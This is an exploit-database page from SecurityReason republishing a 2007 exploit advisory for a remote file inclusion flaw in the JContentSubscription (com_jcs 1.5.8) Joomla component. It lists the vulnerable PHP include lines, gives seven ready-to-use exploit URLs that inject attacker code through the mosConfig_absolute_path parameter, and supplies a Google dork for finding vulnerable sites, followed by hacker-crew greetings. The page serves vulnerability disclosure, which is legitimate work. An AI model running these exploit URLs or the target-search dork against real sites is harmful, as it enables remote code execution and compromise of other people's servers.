|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  ExploitAlert Database |
||
ExploitAlert : 2880 Credit : NoGe Date : 11.10.2007 Exploit Code : # JContentSubscription Joomla Component 1.5.8 Multiply Remote File Include Vulnerability Component : com_jcs version 1.5.8 - payable component Dicovered by : NoGe Contact : pace.noge@hotmail.com =========================================================================== ======================================================= # Vulnerable file /administrator/components/com_jcs/jcs.function.php line 6 require_once( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' ); /administrator/components/com_jcs/view/add.php line 7 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' ); /administrator/components/com_jcs/view/history.php line 7 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' ); /administrator/components/com_jcs/view/register.php line 6 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' ); /administrator/components/com_jcs/views/list.sub.html.php line 3 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" ); /administrator/components/com_jcs/views/list.user.sub.html.php line 7 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" ); /administrator/components/com_jcs/views/reports.html.php line 3 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" ); # Exploit http://localhost/path/administrator/components/com_jcs/jcs.function.php?mos Config_absolute_path=[evilcode] http://localhost/path/administrator/components/com_jcs/view/add.php?mosConf ig_absolute_path=[evilcode] http://localhost/path/administrator/components/com_jcs/view/history.php?mos Config_absolute_path=[evilcode] http://localhost/path/administrator/components/com_jcs/view/register.php?mo sConfig_absolute_path=[evilcode] http://localhost/path/administrator/components/com_jcs/views/list.sub.html. php?mosConfig_absolute_path=[evilcode] http://localhost/path/administrator/components/com_jcs/views/list.user.sub. html.php?mosConfig_absolute_path=[evilcode] http://localhost/path/administrator/components/com_jcs/views/reports.html.p hp?mosConfig_absolute_path=[evilcode] # Google dork inurl:com_jcs =========================================================================== ======================================================= # Greetz all crew #papuahacker #baliemhackerlink #nyubicrew skulmatic olibekas ulga Cungkee nyubi k1tk4t newbie str0ke yooogy H312Y Vaksin13 Oon_Boy Paman mousekill }^-^{ haliq http://kapukvalley.net member =========================================================================== =======================================================  Feedback : If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com. |
||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |